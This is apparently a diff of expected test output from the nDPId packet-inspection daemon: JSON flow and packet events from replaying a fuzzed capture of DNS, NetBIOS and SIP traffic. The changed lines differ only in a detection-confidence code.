00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469540839,"flow_last_seen":1120470114299,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1492,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1120469540839,"flow_last_seen":1120470114299,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1492,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470116279,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1120470117343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470117343,"pkt":"ADBUADRWAOBJAW69CABFAABIapoAAIARTLcOqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1120470121594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470121594,"pkt":"ADBUADRWAODtAW69CABFAABIapsAAIARTLbAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470121594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1120470129591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470129591,"pkt":"ADBUADRWAODtAW69CABFAABEapwAAIARTLnAqAECwKgBAQrDADUAMM8LVfAAAAABAAAAAAAAATEBMN0wAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470129591,"flow_last_seen":1120470129591,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470129591,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1120470129593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470129593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsMAR7GHVfCAAAABACVzAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470129593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":37,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469940218,"flow_last_seen":1120469948230,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":282,"packets-processed":241,"total-skipped-flows":0,"total-l4-payload-len":24511,"total-not-detected-flows":6,"total-guessed-flows":4,"total-detected-flows":70,"total-detection-updates":26,"total-updates":9,"current-active-flows":63,"total-active-flows":109,"total-idle-flows":46,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":472,"global_ts_msec":1120470141614} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1120470141614,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470141614,"pkt":"ADBUADRWAODtAW69CABFAABIaqIAAIARTK\/AqAECwKgBAQrEADUANAAlcwABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrACVzAAE="} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470141614,"flow_last_seen":1120470141614,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470141614,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1120470142609,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470142609,"pkt":"ADBVADRWAODtAW69CABFAABIaqMAAIARTK7AqAECwKgBAQrEADUANAARKfABVwABAAAAAAAABF\/zaXAEX3VkcANzaXAJY3liZXJjaXSSAmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":283,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470141614,"flow_last_seen":1120470142609,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470142609,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_?ip._udp.sip.cybercit?.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1120470144612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470144612,"pkt":"ADBUADRWAODtAW69CABFAABIaqQAAIARTK3AqAECwKgBAQrEADUANAARKfABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470141614,"flow_last_seen":1120470144612,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470144612,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":287,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470150621,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
